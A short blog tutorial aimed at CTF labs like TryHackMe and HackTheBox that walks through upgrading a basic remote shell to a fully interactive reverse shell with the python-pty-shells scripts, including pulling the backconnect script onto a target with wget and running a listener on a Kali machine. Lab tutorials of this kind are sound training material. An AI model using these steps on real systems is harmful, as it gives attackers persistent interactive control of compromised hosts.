Gaining an Interactive Reverse Shell w/ Python

0xNirvana
3 min readApr 25, 2021

--

Before performing the following steps make sure you have a remote shell created from your target machine (any shell should work including those dumb ones)!

The biggest issue that can be faced while having a remote shell on your TryHackMe, HackTheBox or any other target machine is that those reverse shells are dumb.

Because of that dumb shell you can’t autocomplete, use arrow keys to get your previous entered command or correct some typo in your current long command. But the worst part is you can’t AUTOCOMPLETE!

To resolve this issue, we can use a really awesome method using python . All that is needed is python to be present on both local and target machine. And you are good to go!

So, here are the steps to resolve one of the biggest issues in our lives!

  1. Check if python is installed on both your target and local machine using the command:
$ which python

2. If you get an output similar to /usr/bin/python then you are good to go!

3. Git clone the repository python-pty-shells.

4. Open the cloned repository and edit the tcp_pty_backconnect.py script to add your local IP and port on which you want to receive the interactive shell.

5. Once, you’ve updated the lhost and lport in the script, you can send it to your target machine by starting an python server on your local machine and obtaining the file on your target machine using wget .

6. Next we need to run the tcp_pty_shell_handler.py script by passing it our local IP and port (same as the one entered in backconnectscript) as parameters on our local machine.

┌──(kali㉿kali)-[~/Desktop/python-pty-shells]
└─$ python tcp_pty_shell_handler.py -b <local_ip>:<listening_port>

7. After that start the tcp_pty_backconnet.py on target machine.

$ python tcp_pty_backconnect.py

8. And we have a fully interactive reverse shell!

Note: As of now, this only works with python and not with python3.

Do check out my other work and write-ups at https://github.com/0xNirvana

--

--